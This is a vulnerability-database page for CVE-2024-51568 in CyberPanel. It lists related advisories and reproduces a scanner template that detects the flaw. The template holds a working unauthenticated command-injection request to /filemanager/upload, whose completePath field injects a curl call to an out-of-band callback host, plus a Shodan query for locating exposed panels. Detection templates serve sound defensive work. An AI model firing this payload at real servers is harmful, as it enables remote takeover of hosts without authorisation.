| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2024-51568 | 30 Oct 202400:49 | – | circl | |
| CyberPanel 安全漏洞 | 29 Oct 202400:00 | – | cnnvd | |
| CVE-2024-51568 | 29 Oct 202400:00 | – | cve | |
| CVE-2024-51568 | 29 Oct 202400:00 | – | cvelist | |
| Exploit for OS Command Injection in Cyberpanel | 2 Sep 202507:51 | – | githubexploit | |
| CyberPanel Multi CVE Pre-auth RCE | 5 Dec 202418:56 | – | metasploit | |
| CVE-2024-51568 | 29 Oct 202423:15 | – | nvd | |
| CVE-2024-51568 | 29 Oct 202423:15 | – | osv | |
| Cyber Panel 2.3.x Remote Command Execution | 13 Mar 202500:00 | – | packetstorm | |
| PT-2024-34711 | 29 Oct 202400:00 | – | ptsecurity |
id: CVE-2024-51568
info:
name: CyberPanel - Command Injection
author: s4e-io
severity: critical
description: |
CyberPanel (aka Cyber Panel) before 2.3.5 allows Command Injection via completePath in the ProcessUtilities.outputExecutioner() sink. There is /filemanager/upload (aka File Manager upload) unauthenticated remote code execution via shell metacharacters.
impact: |
Attackers can exploit this vulnerability to compromise system security.
remediation: |
Apply security patches to address CVE-2024-51568.
reference:
- https://www.rapid7.com/db/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve/
- https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
- https://nvd.nist.gov/vuln/detail/CVE-2024-51568
- https://cyberpanel.net/blog/cyberpanel-v2-3-5
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-51568
cwe-id: CWE-78
epss-score: 0.45682
epss-percentile: 0.98648
metadata:
verified: true
max-request: 2
vendor: cyberpanel
product: cyberpanel
shodan-query: http.html:"login to your cyberpanel account"
tags: cve,cve2024,cyberpanel,rce,intrusive,vkev,vuln
variables:
boundary: "{{to_lower(rand_base(9))}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /filemanager/upload HTTP/1.1
Host: {{Hostname}}
X-CSRFToken: {{csrftoken}}
Content-Type: multipart/form-data; boundary=----NewBoundary{{boundary}}
------NewBoundary{{boundary}}
Content-Disposition: form-data; name="domainName"
{{Hostname}}
------NewBoundary{{boundary}}
Content-Disposition: form-data; name="completePath"
; curl -X POST http://{{interactsh-url}}
------NewBoundary{{boundary}}
Content-Disposition: form-data; name="file"; filename="{{filename}}.txt"
pwd
------NewBoundary{{boundary}}--
matchers:
- type: dsl
dsl:
- "status_code == 200"
- 'contains(interactsh_protocol, "dns")'
- 'contains_all(body, "status\":", "error_message\":")'
condition: and
extractors:
- type: regex
part: header
name: csrftoken
group: 1
regex:
- csrftoken=([A-Za-z0-9]+)
internal: true
# digest: 4a0a00473045022100c186ea15a6cfdd1f1a8ec72984e1ca091d3efacbc6f57dc88e24e4be6c913fb602201e51142027f5cf93ed58ee6f6e2f14e0d400d5efd0209793df32e2295f48f0e3:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation